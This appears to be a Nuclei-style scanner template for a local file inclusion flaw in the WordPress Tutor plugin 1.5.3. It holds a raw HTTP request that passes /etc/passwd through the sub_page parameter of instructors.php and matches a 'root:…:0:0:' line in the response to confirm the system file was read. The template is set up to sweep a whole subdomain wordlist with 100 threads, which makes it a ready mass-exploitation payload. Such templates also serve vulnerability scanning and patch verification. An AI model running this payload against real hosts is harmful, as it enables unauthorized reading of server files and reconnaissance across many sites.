id: wp-tutor-lfi

info:
  name: WordPress Plugin tutor.1.5.3 - Local File Inclusion
  author: 0x240x23elu
  severity: high
  reference: https://www.exploit-db.com/exploits/48058
  tags: wordpress,wp-plugin,lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body